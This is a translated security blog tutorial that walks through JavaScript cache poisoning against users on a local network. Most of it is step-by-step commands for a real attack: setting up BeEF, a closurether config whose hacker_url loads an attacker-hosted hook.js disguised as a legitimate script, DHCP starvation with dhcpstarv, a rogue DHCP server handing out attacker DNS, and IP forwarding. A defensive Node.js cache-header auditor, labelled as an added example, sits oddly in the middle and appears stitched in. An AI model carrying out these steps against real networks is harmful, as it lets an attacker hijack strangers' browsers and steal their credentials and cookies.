Javascript Cache Poisoning learning and practice
0x00 Background
Not long ago I bought a WooYun WiFi device, and its feature list mentions Cache Poisoning:
Here is the description given by WooYun WiFi:
By default this feature comes with cache poisoning enabled: it caches every page the victim views until January 1, 2099, and only clearing all cache and browser data removes the effect of the cache poisoning.
I think this is a very good technique, so after reading the article by @EtherDream and searching around on Google and Baidu, I wrote up this summary.
0x01 Overview & principles
JavaScript cache poisoning, put bluntly, means that the victim's browser caches a tampered JS script; as long as the cache is not cleared, the victim loads our script every time they visit the page.
So what is the principle? It is very simple: the browser cache mechanism. To speed up access to static resources, large websites let the client cache some of them; this improves the user experience and reduces the load on the web servers.
Browser cache control mechanisms include HTML meta tags and HTTP response headers. For example, a web developer can add a meta tag to the <head> node like this:
The code tells the browser not to cache the current page, so every visit has to fetch it from the server again. I will not go further into browser caching mechanisms here.
To preload and cache a script you only need new Image().src = ''. A few browsers do not support this, but both IE and Chrome do: although the JS file is not an image, it is still cached.
0x02 Preparations
Install node:
    wget https://codeload.github.com/nodejs/node/zip/master -O node-master.zip   # download
    unzip node-master.zip                                                        # unzip (the archive is a zip, not a tarball)
    cd node-master
    ./configure
    make                                                                         # compile
    make install                                                                 # install
Install closurether:
    npm install -g closurether
Install phantomjs:
Download the phantomjs build for your system from its website and install it.
0x03 Example
During the test, the demo by EtherDream was used. The specific process is as follows.
Download and install:
    root@kali:~/Desktop# git clone https://github.com/EtherDream/mitm-http-cache-poisoning.git js
    root@kali:~/Desktop# cd js
    root@kali:~/Desktop/js# npm install
Update the cache list:
    root@kali:~/Desktop/js# cd tool/
    root@kali:~/Desktop/js/tool# phantomjs sniffer.js -i url.txt -o target.json
This script finds the longest-cached script resources on each website, that is, the links of the scripts to be infected. Add the websites to url.txt and copy the generated json to the asset directory:
    root@kali:~/Desktop/js/tool# cp -fr target.json ../asset/
Run:
    root@kali:~/Desktop/js/tool# cd ..
    root@kali:~/Desktop/js# node index.js
Test:
Set the browser's HTTP proxy to 127.0.0.1:8080 and visit any HTTP site.
Turn the proxy off and open websites such as 126 and 360 (the Chrome test succeeded, Firefox failed).
Close the browser (without clearing the cache) and open it again. When you visit 360, a dialog box is displayed.
Specifically, index.js implements the proxy, replaces the original static script response body, and changes the Cache-Control field of the response header to max-age=31536000, as shown in the code.
The replacement script is stub.js under the asset directory; the key code in stub.js that injects the external JavaScript looks like this:
Here www.etherdream.com/hack/trojan.js is the JS under our control. In this example its content is
alert('xss run: ' + location.href);
We can implement different functions by modifying the script content.
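The browser cache mechanism described in 0x01 and the Cache-Control rewrite described above both come down to how long a script response stays fresh. As an added example (not code from this article, from closurether or from EtherDream's demo), the following Node.js snippet computes that freshness lifetime from response headers following the RFC 7234 rules, so that a site owner can check their own script headers and see how long a poisoned copy would survive; the sample headers are constructed and the 30-day threshold is an arbitrary assumption.

```javascript
// Added example: compute how long a browser may keep a script response fresh.
// RFC 7234: no-store / no-cache mean "revalidate or do not store" (lifetime 0),
// Cache-Control max-age takes precedence over Expires, Expires is relative to
// the Date header (here: the receive time). Heuristic freshness is not counted.
const SECONDS_PER_DAY = 86400;

// "public, max-age=31536000" -> { public: true, 'max-age': '31536000' }
function parseCacheControl(value) {
  const directives = {};
  for (const part of String(value || '').split(',')) {
    const [name, val] = part.trim().split('=');
    if (name) directives[name.toLowerCase()] = val === undefined ? true : val.replace(/^"|"$/g, '');
  }
  return directives;
}

// headers: plain object with lowercase header names; returns seconds of freshness.
function freshnessLifetime(headers, now = new Date()) {
  const cc = parseCacheControl(headers['cache-control']);
  if (cc['no-store'] || cc['no-cache']) return 0;
  if ('max-age' in cc) return Math.max(0, parseInt(cc['max-age'], 10) || 0);
  if (headers['expires']) {
    const expires = Date.parse(headers['expires']);
    if (Number.isNaN(expires)) return 0; // an invalid Expires date counts as already stale
    return Math.max(0, Math.floor((expires - now.getTime()) / 1000));
  }
  return 0;
}

// Report script responses whose freshness exceeds maxDays (assumed threshold: 30 days).
function auditScripts(responses, maxDays = 30) {
  return responses
    .map(r => ({ url: r.url, days: freshnessLifetime(r.headers, r.receivedAt) / SECONDS_PER_DAY }))
    .filter(r => r.days > maxDays);
}

// Constructed sample: a normally cached script, one rewritten the way the article's
// proxy does (max-age=31536000), a no-store script, and a far-future Expires header
// like the "until January 1, 2099" behaviour quoted in 0x00.
const SAMPLE = [
  { url: 'https://example.test/js/app.js', headers: { 'cache-control': 'public, max-age=3600' } },
  { url: 'https://example.test/js/vendor.js', headers: { 'cache-control': 'max-age=31536000' } },
  { url: 'https://example.test/js/session.js', headers: { 'cache-control': 'no-store' } },
  { url: 'https://example.test/js/legacy.js',
    headers: { expires: 'Wed, 01 Jan 2099 00:00:00 GMT' },
    receivedAt: new Date('2015-08-01T00:00:00Z') },
];

console.log(auditScripts(SAMPLE)); // vendor.js (365 days) and legacy.js are flagged
```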
0x04 Practice
In this practice, dhcpstarv, isc-dhcp-server, beef and closurether are used on the LAN. The attacker machine runs Kali 2.0.
1. Start beef:
    root@kali:~# cd /usr/share/beef-xss/
    root@kali:/usr/share/beef-xss# ./beef
2. Configure closurether
Obtain the latest cache list:
    root@kali:~# cd /usr/local/lib/node_modules/closurether/tool/cache-sniffer
    root@kali:/usr/local/lib/node_modules/closurether/tool/cache-sniffer# phantomjs sniffer.js
You can choose the websites by editing the url list; in this test it contained the 126 and 360 sites. Configure config.json as follows:
    {
      "hacker_url": "http://192.168.1.108:3000/hook.js",
      "inject_url": "http://10086.cn/js10086/201306301200.js",
      "debug": false,
      "dump": false,
      "dumpPath": "./dump/"
    }
Here hacker_url is the address of our JS, i.e. the beef hook, and inject_url is the address the JS is disguised as.
Run closurether:
    root@kali:~# closurether
    [SYS] local ip: 192.168.1.108
    [DNS] running 0.0.0.0:53
    [WEB] listening :::80
    [WEB] listening :::443
3. DHCP attack:
Download dhcpstarv and install:
    root@kali:~/Desktop# tar zxvf dhcpstarv-0.2.1.tar.gz
    root@kali:~/Desktop# cd dhcpstarv-0.2.1/
    root@kali:~/Desktop/dhcpstarv-0.2.1# ./configure
    root@kali:~/Desktop/dhcpstarv-0.2.1# make
    root@kali:~/Desktop/dhcpstarv-0.2.1# make install
dhcpstarv is not installed in Kali by default; yersinia can be used instead.
Install the dhcp server:
root@kali:~# apt-get install isc-dhcp-server
Modify the DHCP configuration file dhcpd.conf:
    root@kali:~# cd /etc/dhcp/
    root@kali:/etc/dhcp# cp dhcpd.conf dhcpd.conf.bak
    root@kali:/etc/dhcp# vim dhcpd.conf
Change the address pool handed out by DHCP, set the default route to the IP address of the original router, and change the broadcast address:
Set the DNS server to the address where closurether is running, for example:
It is best to add a normal DNS server address as a fallback, in case our DNS service fails to resolve some domain names.
Enable route forwarding for the operating system:
root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward
Start the DHCP service:
root@kali:/etc/dhcp# service isc-dhcp-server start
Attack normal dhcp servers and consume ip resources:
root@kali:~# dhcpstarv -i eth0 -e 192.168.1.108
The -e parameter takes the attacker's IP address.
Then, when a new client connects to the LAN, it receives its address from the attacker's DHCP server, because the legitimate DHCP server has no free addresses left. For example:
We can see that DNS has changed to the address we want to change.
If you can change the DNS setting in the router directly, do that instead; it is more stable. Point the DNS to the address where closurether runs.
Run the main tool:
Now, when a client whose DNS has been tampered with browses a website, it runs our injected JS. After opening 126, we can see that the browser has come online in beef:
while our JS is disguised as the 10086 script:
Restart the router so that normal DHCP assigns the virtual machine its IP address again, and open 360 in the browser (cache not cleared):
At this time, we can see that beef is going online again:
Beef has powerful functions, but it is not the focus of this article. Of course, the JS can also be replaced with other functionality, such as stealing account names and passwords on some websites or obtaining client cookies; I will not go into that here.
This achieves the "time machine" effect: although the network environment has changed, the browser cache has not been cleared, so our JS still executes and the whole attack is complete.
0x05 Summary
From the process above we can draw one conclusion: do not casually connect to WiFi networks you do not know!